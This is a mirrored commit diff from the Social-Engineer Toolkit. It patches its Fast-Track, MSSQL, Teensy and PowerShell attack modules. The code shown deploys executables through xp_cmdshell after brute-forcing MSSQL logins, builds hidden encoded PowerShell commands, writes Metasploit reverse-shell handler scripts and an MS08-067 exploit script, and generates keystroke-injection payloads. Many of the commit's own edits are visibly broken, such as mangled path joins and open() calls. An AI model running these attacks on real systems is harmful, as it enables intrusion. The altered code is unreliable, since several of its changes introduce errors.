mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-22 12:33:06 +00:00
fasttrack fixes and version bump
This commit is contained in:
parent
46324916e6
commit
98b85deae4
15 changed files with 95 additions and 81 deletions
|
@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
|
|||
############
|
||||
# PATCH Server IP into RATTE
|
||||
############
|
||||
with open(os.path.join(core.setdir, "ratteM.exe"), "wb") as filewrite:
|
||||
with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:
|
||||
|
||||
host = (len(ipaddr) + 1) * "X"
|
||||
r_port = (len(str(ratteport)) + 1) * "Y"
|
||||
|
@ -126,7 +126,7 @@ def main():
|
|||
############
|
||||
prepare_ratte(ipaddr, ratteport, persistent, customexe)
|
||||
|
||||
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe"))
|
||||
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
|
||||
|
||||
###################
|
||||
# start ratteserver
|
||||
|
|
|
@ -1,3 +1,12 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.4
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid
|
||||
* fixed an issue that would cause UDP to not work properly when scanning subnet ranges
|
||||
* improved handling and descriptions in mssql
|
||||
* fixed error in mssql bruter
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.3
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
2
seproxy
2
seproxy
|
@ -45,7 +45,7 @@ if operating_system == "posix":
|
|||
else:
|
||||
proxy_string = "export http_proxy='http://{0}'".format(proxy)
|
||||
|
||||
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite:
|
||||
filewrite.write(proxy_string)
|
||||
|
||||
def kill_proc(port, flag):
|
||||
|
|
|
@ -97,11 +97,14 @@ try:
|
|||
iprange = iprange.split(",")
|
||||
for host in iprange:
|
||||
sqlport = get_sql_port(host)
|
||||
if sqlport != None: print_status("Found SQL port on IP Address: %s and on port: %s" % (host, sqlport))
|
||||
if sqlport == None:
|
||||
sql_nmap_scan(host)
|
||||
if sql_nmap_scan != None:
|
||||
nmapscan = sql_nmap_scan(host)
|
||||
if nmapscan != "":
|
||||
sql_servers = sql_servers + \
|
||||
host + ":" + "1433" + ","
|
||||
print_status("Found a SQL port on IP Address: %s and on port: 1433" % (host))
|
||||
if nmapscan == "": print_warning("Unable to find a SQL server on IP: %s" % (host))
|
||||
if sqlport != None:
|
||||
sql_servers = sql_servers + \
|
||||
host + ":" + sqlport + ","
|
||||
|
|
|
@ -1 +1 @@
|
|||
7.3.3
|
||||
7.3.4
|
||||
|
|
|
@ -1662,7 +1662,7 @@ def start_dns():
|
|||
|
||||
def setdir():
|
||||
if check_os() == "posix":
|
||||
return os.path.join(os.path.expanduser('~'), '.set')
|
||||
return os.path.join(os.path.expanduser('~'), '.set' + '/')
|
||||
if check_os() == "windows":
|
||||
return "src/program_junk/"
|
||||
|
||||
|
|
|
@ -44,8 +44,8 @@ def launch():
|
|||
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
|
||||
# try/catch block
|
||||
try:
|
||||
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'),
|
||||
os.path.join(core.setdir, "autopwn.answer")))
|
||||
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
|
||||
os.path.join(core.setdir + "autopwn.answer")))
|
||||
child.interact()
|
||||
|
||||
# handle exceptions and log them
|
||||
|
|
|
@ -17,7 +17,7 @@ except NameError:
|
|||
|
||||
|
||||
def create_rc(revhost, victim, payload, port):
|
||||
with open("/root/.set/ms08-067.rc", "w") as filewrite:
|
||||
with open("/root/.set/ms08-067.rc" + "w") as filewrite:
|
||||
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
|
||||
"set payload {0}\n"
|
||||
"set RHOST {1}\n"
|
||||
|
|
|
@ -96,6 +96,7 @@ def brute(ipaddr, username, port, wordlist):
|
|||
def deploy_hex2binary(ipaddr, port, username, password):
|
||||
# base variable used to select payload option
|
||||
option = None
|
||||
choice1 = "1"
|
||||
|
||||
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
|
||||
username,
|
||||
|
@ -152,6 +153,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
choice1 = input("1.) Use Metasploit (default)\n"
|
||||
"2.) Select your own\n\n"
|
||||
"Enter your choice[1]:")
|
||||
|
||||
if choice1 == "":
|
||||
choice1 = "1"
|
||||
|
||||
|
@ -177,8 +179,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
|
||||
# if we are using a SET interactive shell payload then we need to make
|
||||
# the path under web_clone versus ~./set
|
||||
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
|
||||
web_path = os.path.join(core.setdir, "web_clone")
|
||||
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
web_path = os.path.join(core.setdir + "web_clone")
|
||||
# then we are using metasploit
|
||||
else:
|
||||
if operating_system == "posix":
|
||||
|
@ -187,12 +189,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
if not os.path.isfile(core.setdir + "1msf.exe"):
|
||||
# move it then
|
||||
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
(core.setdir + core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
(core.setdir + core.setdir), shell=True).wait()
|
||||
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
|
||||
(core.setdir, core.setdir), shell=True).wait()
|
||||
payload_filename = os.path.join(web_path, "1msf.exe")
|
||||
(core.setdir + core.setdir), shell=True).wait()
|
||||
payload_filename = os.path.join(web_path + "1msf.exe")
|
||||
|
||||
with open(payload_filename, "rb") as fileopen:
|
||||
# read in the binary
|
||||
|
@ -201,12 +203,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
data = binascii.hexlify(data)
|
||||
# we write out binary out to a file
|
||||
|
||||
with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
|
||||
filewrite.write(data)
|
||||
|
||||
if choice1 == "1":
|
||||
# if we are using metasploit, start the listener
|
||||
if not os.path.isfile(os.path.join(core.setdir, "set.payload")):
|
||||
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
if operating_system == "posix":
|
||||
try:
|
||||
core.module_reload(pexpect)
|
||||
|
@ -214,8 +216,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
import pexpect
|
||||
core.print_status("Starting the Metasploit listener...")
|
||||
msf_path = core.meta_path()
|
||||
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
|
||||
os.path.join(core.setdir, "meta_config")))
|
||||
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
|
||||
os.path.join(core.setdir + "meta_config")))
|
||||
|
||||
# random executable name
|
||||
random_exe = core.generate_random_string(10, 15)
|
||||
|
@ -239,7 +241,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
|
||||
|
||||
|
@ -249,23 +251,23 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
import src.payloads.powershell.prep
|
||||
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
|
||||
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
|
||||
|
||||
with open(os.path.join(core.setdir, "x86.powershell")) as x86:
|
||||
with open(os.path.join(core.setdir + "x86.powershell")) as x86:
|
||||
x86 = x86.read()
|
||||
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, "
|
||||
"they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
|
||||
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
|
||||
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
|
||||
filewrite.write(x86)
|
||||
|
||||
# if our payload is x86 based - need to prep msfconsole rc
|
||||
if payload == "x86":
|
||||
powershell_command = x86
|
||||
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
|
||||
with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
|
||||
filewrite.write("use multi/handler\n"
|
||||
"set payload windows/meterpreter/reverse_https\n"
|
||||
"set lport {0}\n"
|
||||
|
@ -284,8 +286,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
import pexpect
|
||||
|
||||
core.print_status("Starting the Metasploit listener...")
|
||||
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
|
||||
os.path.join(core.setdir, "reports/powershell/powershell.rc")))
|
||||
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
|
||||
os.path.join(core.setdir + "reports/powershell/powershell.rc")))
|
||||
core.print_status("Waiting for the listener to start first before we continue forward...")
|
||||
core.print_status("Be patient, Metaploit takes a little bit to start...")
|
||||
child2.expect("Starting the payload handler", timeout=30000)
|
||||
|
@ -304,7 +306,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
# here we start the conversion and execute the payload
|
||||
core.print_status("Sending the main payload via to be converted back to a binary.")
|
||||
# read in the file 900 bytes at a time
|
||||
with open(os.path.join(core.setdir, 'payload.hex')) as fileopen:
|
||||
with open(os.path.join(core.setdir + 'payload.hex')) as fileopen:
|
||||
core.print_status("Dropping initial begin certificate header...")
|
||||
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
|
||||
for data in fileopen.read(900).rstrip():
|
||||
|
@ -325,10 +327,10 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
|
||||
# if we are using SET payload
|
||||
if choice1 == "1":
|
||||
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
|
||||
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
core.print_status("Spawning separate child process for listener...")
|
||||
try:
|
||||
shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath)
|
||||
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
@ -361,8 +363,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
if option == "2":
|
||||
core.print_status("Triggering payload stager...")
|
||||
alphainject = ""
|
||||
if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")):
|
||||
with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen:
|
||||
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
|
||||
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
|
||||
alphainject = fileopen.read()
|
||||
|
||||
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
|
||||
|
@ -370,9 +372,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
thread.start_new_thread(conn.execute_query, (sql_command,))
|
||||
time.sleep(1)
|
||||
|
||||
# if pexpect doesnt exit right then it freaks out
|
||||
# if pexpect doesnt exit right then it freaks out
|
||||
if choice1 == "1":
|
||||
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
|
||||
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
|
||||
os.system("python ../../payloads/set_payloads/listener.py")
|
||||
try:
|
||||
# interact with the child process through pexpect
|
||||
|
|
|
@ -68,7 +68,7 @@ try:
|
|||
if port == "":
|
||||
port = "443"
|
||||
core.update_options("PORT={0}".format(port))
|
||||
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite.write("{0} {1},".format(payload, port))
|
||||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
|
@ -80,14 +80,14 @@ try:
|
|||
import src.payloads.powershell.prep
|
||||
|
||||
# create the directory if it does not exist
|
||||
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
|
||||
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
|
||||
|
||||
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
|
||||
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
x86 = fileopen.read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
|
||||
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
filewrite.write(x86)
|
||||
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
|
||||
command = x86 # assign powershell to command
|
||||
|
@ -113,8 +113,8 @@ try:
|
|||
|
||||
# launch metasploit below
|
||||
core.print_status("Launching Metasploit.. This may take a few seconds.")
|
||||
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"),
|
||||
os.path.join(core.setdir, "reports/powershell/powershell.rc")),
|
||||
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
|
||||
os.path.join(core.setdir + "reports/powershell/powershell.rc")),
|
||||
shell=True).wait()
|
||||
|
||||
# handle exceptions
|
||||
|
|
|
@ -48,7 +48,7 @@ Next
|
|||
'''.format(sms_server, package_id)
|
||||
|
||||
# write out the file to reports
|
||||
with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite:
|
||||
with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite:
|
||||
filewrite.write(configuration)
|
||||
core.print_status("The SCCM configuration script has been successfully created.")
|
||||
core.print_status("You need to copy the script to the startup folder of the server.")
|
||||
|
|
|
@ -246,7 +246,7 @@ except KeyboardInterrupt:
|
|||
|
||||
print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
|
||||
# grab msfvenom alphanumeric shellcode to be inserted into shellexec
|
||||
proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path(), "msfvenom"),
|
||||
proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path() + "msfvenom"),
|
||||
payload,
|
||||
ipaddr,
|
||||
port,
|
||||
|
@ -440,15 +440,15 @@ Keyboard.send_now();
|
|||
}}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload))
|
||||
# delete temporary file
|
||||
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
|
||||
print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir, "/reports/binary2teensy.pde")))
|
||||
print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir + "/reports/binary2teensy.pde")))
|
||||
# write the teensy.pde file out
|
||||
with open(os.path.join(core.setdir, "/reports/binary2teensy.pde"), 'w') as filewrite:
|
||||
with open(os.path.join(core.setdir + "/reports/binary2teensy.pde"), 'w') as filewrite:
|
||||
# write the teensy.pde file out
|
||||
filewrite.write(output_variable)
|
||||
|
||||
print(" [*] Generating a listener...")
|
||||
# create our metasploit answer file
|
||||
with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite:
|
||||
with open(os.path.join(core.setdir + "answer.txt", "w")) as filewrite:
|
||||
filewrite.write("use multi/handler\n"
|
||||
"set payload {0}\n"
|
||||
"set LHOST {1}\n"
|
||||
|
@ -456,9 +456,9 @@ with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite:
|
|||
"{3}\n"
|
||||
"exploit -j".format(payload, ipaddr, port, url))
|
||||
# spawn a multi/handler listener
|
||||
subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir, "answer.txt")), shell=True).wait()
|
||||
subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir + "answer.txt")), shell=True).wait()
|
||||
print(" [*] Housekeeping old files...")
|
||||
# if our answer file is still there (which it should be), then remove it
|
||||
if os.path.isfile(os.path.join(core.setdir, "answer.txt")):
|
||||
if os.path.isfile(os.path.join(core.setdir + "answer.txt")):
|
||||
# remove the old file, no longer used once we've exited
|
||||
subprocess.Popen(os.path.join(core.setdir, "answer.txt"), shell=True).wait()
|
||||
subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True).wait()
|
||||
|
|
|
@ -24,18 +24,18 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
|
|||
payload = "windows/meterpreter/reverse_tcp"
|
||||
|
||||
# create base metasploit payload to pass to powershell.prep
|
||||
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite:
|
||||
with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite:
|
||||
filewrite.write(payload)
|
||||
|
||||
ipaddr = input("Enter the IP for the reverse: ")
|
||||
port = input("Enter the port for the reverse: ")
|
||||
|
||||
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
|
||||
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite:
|
||||
with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite:
|
||||
filewrite.write(shellcode)
|
||||
|
||||
time.sleep(3)
|
||||
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
|
||||
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
pass
|
||||
# read in x amount of bytes
|
||||
data_read = int(50)
|
||||
|
@ -149,10 +149,10 @@ Keyboard.set_key1(0);
|
|||
Keyboard.send_now();
|
||||
}
|
||||
""")
|
||||
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde")))
|
||||
if not os.path.isdir(os.path.join(core.setdir, "reports")):
|
||||
os.makedirs(os.path.join(core.setdir, "reports"))
|
||||
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite:
|
||||
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde")))
|
||||
if not os.path.isdir(os.path.join(core.setdir + "reports")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports"))
|
||||
with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite:
|
||||
filewrite.write(teensy)
|
||||
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
|
||||
if choice == "YES":
|
||||
|
@ -170,7 +170,7 @@ if choice == "YES":
|
|||
else:
|
||||
port = input("Enter the port to connect back on: ")
|
||||
|
||||
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite:
|
||||
with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite:
|
||||
filewrite.write("use multi/handler\n"
|
||||
"set payload {0}\n"
|
||||
"set LHOST {1}\n"
|
||||
|
@ -180,8 +180,8 @@ if choice == "YES":
|
|||
|
||||
print("[*] Launching Metasploit....")
|
||||
try:
|
||||
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
|
||||
os.path.join(core.setdir, "metasploit.answers")))
|
||||
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
|
||||
os.path.join(core.setdir + "metasploit.answers")))
|
||||
child.interact()
|
||||
except:
|
||||
pass
|
||||
|
|
|
@ -30,8 +30,8 @@ if operating_system != "windows":
|
|||
import pexpect
|
||||
|
||||
# check to see if setdir is created
|
||||
if not os.path.isdir(os.path.join(core.setdir, "reports")):
|
||||
os.makedirs(os.path.join(core.setdir, "reports"))
|
||||
if not os.path.isdir(os.path.join(core.setdir + "reports")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports"))
|
||||
|
||||
definepath = os.getcwd()
|
||||
# define if use apache or not
|
||||
|
@ -57,7 +57,7 @@ for line in apache_check:
|
|||
|
||||
# grab info from config file
|
||||
|
||||
with open(os.path.join(core.setdir, "teensy")) as fileopen:
|
||||
with open(os.path.join(core.setdir + "teensy")) as fileopen:
|
||||
counter = 0
|
||||
payload_counter = 0
|
||||
choice = None
|
||||
|
@ -77,14 +77,14 @@ with open(os.path.join(core.setdir, "teensy")) as fileopen:
|
|||
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
|
||||
core.update_options("IPADDR=" + ipaddr)
|
||||
|
||||
if not os.path.isfile(os.path.join(core.setdir, "teensy")):
|
||||
if not os.path.isfile(os.path.join(core.setdir + "teensy")):
|
||||
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
|
||||
core.exit_set()
|
||||
|
||||
|
||||
def writefile(filename, now):
|
||||
with open(os.path.join("src/teensy", filename)) as fileopen, \
|
||||
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
|
||||
with open(os.path.join("src/teensy" + filename)) as fileopen, \
|
||||
open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
|
||||
|
||||
for line in fileopen:
|
||||
match = re.search("IPADDR", line)
|
||||
|
@ -128,8 +128,8 @@ if choice == "13":
|
|||
|
||||
# save our stuff here
|
||||
print(core.bcolors.BLUE +
|
||||
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir,
|
||||
"reports",
|
||||
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir +
|
||||
"reports" +
|
||||
"teensy_{0}.pde".format(now))) +
|
||||
core.bcolors.ENDC)
|
||||
print(core.bcolors.GREEN +
|
||||
|
@ -142,29 +142,29 @@ print(core.bcolors.RED +
|
|||
pause = input("Press {return} to continue.")
|
||||
|
||||
if payload_counter == 1:
|
||||
webclone_path = os.path.join(core.setdir, "web_clone")
|
||||
metasploit_exec_path = os.path.join(core.setdir, "msf.exe")
|
||||
webclone_path = os.path.join(core.setdir + "web_clone")
|
||||
metasploit_exec_path = os.path.join(core.setdir + "msf.exe")
|
||||
if not apache:
|
||||
|
||||
subprocess.Popen("mkdir {0};"
|
||||
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path,
|
||||
metasploit_exec_path,
|
||||
os.path.join(webclone_path, "x.exe")),
|
||||
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path +
|
||||
metasploit_exec_path +
|
||||
os.path.join(webclone_path + "x.exe")),
|
||||
shell=True).wait()
|
||||
|
||||
if operating_system != "windows":
|
||||
child = pexpect.spawn("python src/html/web_server.py")
|
||||
|
||||
else:
|
||||
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait()
|
||||
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait()
|
||||
|
||||
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
|
||||
if os.path.isfile(os.path.join(core.setdir + "meta_config")):
|
||||
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
|
||||
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
|
||||
try:
|
||||
if operating_system != "windows":
|
||||
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"),
|
||||
os.path.join(core.setdir, "meta_config")))
|
||||
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"),
|
||||
os.path.join(core.setdir + "meta_config")))
|
||||
child1.interact()
|
||||
except:
|
||||
if operating_system != "windows":
|
||||
|
|
|
@ -89,14 +89,14 @@ else:
|
|||
if fakeap_dhcp_menu_choice == "1":
|
||||
# writes the dhcp server out
|
||||
core.print_status("Writing the dhcp configuration file to ~/.set")
|
||||
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
|
||||
filewrite.write(dhcp_config1)
|
||||
dhcptun = 1
|
||||
|
||||
if fakeap_dhcp_menu_choice == "2":
|
||||
# writes the dhcp server out
|
||||
core.print_status("Writing the dhcp configuration file to ~/.set")
|
||||
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
|
||||
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
|
||||
filewrite.write(dhcp_config2)
|
||||
dhcptun = 2
|
||||
|
||||
|
|
Loading…
Reference in a new issue